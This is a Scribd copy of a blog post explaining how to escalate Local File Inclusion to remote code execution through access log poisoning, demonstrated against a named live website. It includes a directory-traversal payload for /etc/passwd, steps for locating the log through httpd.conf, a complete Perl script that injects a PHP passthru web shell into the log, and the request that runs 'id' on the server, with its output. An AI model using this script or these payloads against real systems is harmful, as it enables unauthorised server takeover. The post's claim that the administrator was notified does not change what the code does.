Scribd
Upload
158 views

LFI To RCE Via Access - Log Injection PDF

The document describes how to exploit a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE). It explains how to inject code into the web server's access log by leveraging the LFI. Then by calling a PHP script with a command parameter from the access log, commands can be executed on the server remotely. The document provides steps to find the access log location, inject code into it using a Perl script, and execute commands to prove RCE is achieved.

Uploaded by

cesar augusto palacio echeverri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
158 views

LFI To RCE Via Access - Log Injection PDF

The document describes how to exploit a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE). It explains how to inject code into the web server's access log by leveraging the LFI. Then by calling a PHP script with a command parameter from the access log, commands can be executed on the server remotely. The document provides steps to find the access log location, inject code into it using a Perl script, and execute commands to prove RCE is achieved.

Uploaded by

cesar augusto palacio echeverri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 14

LFI to RCE via access_log injection

NoGe Follow
Jun 6, 2017 · 2 min read

Hi guys

Just wanna share a trick from Local File Inclusion/File Path Traversal to
Remote Code Execution by injecting the access_log.

I have a target http://proqualitycontrol.com/index.php?page=aboutus


and it’s vulnerable to LFI/FPT. It’s a live website. Inject the target with
../../../../../../../../../../../../../../../etc/passwd%00 payload.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Now change with /etc/httpd/conf/httpd.conf. Not all httpd.conf path is
here. To nd the access_log location you need to nd httpd.conf rst.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
View source (ctrl+u) for a better view of their httpd.conf.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Open the le called access_log. In this case
/home/pro_99/proqualitycontrol.com/access_log.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
My friend @paceander coded this perl script to inject the access_log.

#!/usr/bin/perl -w

use IO::Socket::INET;

my $host = $ARGV[0];
my $port = $ARGV[1];

print “*** Injecting $host:$port access log…\n”;

my $rce = “<?if(get_magic_quotes_gpc()){
\$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?
>”;
$sock = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port,
Proto=>”tcp”) || die “Cant connect to $host:$port!\n”;
print $sock “GET /v0pcr3w “.$rce.” HTTP/1.1\r\n”;
print $sock “Host: “.$host.”\r\n”;
print $sock “Connection: close\r\n\r\n”;
close($sock);

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
print “*** Done!\n\n”;

Or you can download it here

Run it “perl log.pl <target> 80”

Open the access_log again and search for v0pcr3w. If the word is there then
we’ve successfully injected the access_log.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Now run this line to execute command on server
/home/pro_99/proqualitycontrol.com/access_log%00&cmd=id and
you’ll see the “id” command executed.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Our command executed successfully GET /v0pcr3w uid=48(apache)
gid=48(apache) groups=48(apache),500(webadmin).

Note: The web administrator has been noti ed about this vulnerability.

Thats all guys, happy hacking!

Bug Bounty Rce Injection Tutorial Vulnerability

406 claps

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
WRITTEN BY

NoGe Follow

researcher | #mufc

See responses (3)

More From Medium

Also tagged Vulnerability

An Open Letter To Those Who Feel Like They


Have To Hold It Together 24/7
Megan Minutillo in P.S. I Love You
Oct 10 · 2 min read 44

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Related reads

Chinese Hackers Back Beijing’s Authoritarian


Pals
Foreign Policy in Foreign Policy
Jul 30, 2018 · 7 min read 97

Related reads

Clobbering the clobbered — Advanced DOM


Clobbering
terjanq
S 26 9 i d 47
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Sep 26 · 9 min read 47

Discover Medium Make Medium yours Become a member


Welcome to a place where words matter. Follow all the topics you care about, and Get unlimited access to the best stories on
On Medium, smart voices and original we’ll deliver the best stories for you to your Medium — and support writers while
ideas take center stage - with no ads in homepage and inbox. Explore you’re at it. Just $5/month. Upgrade
sight. Watch

About Help Legal

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy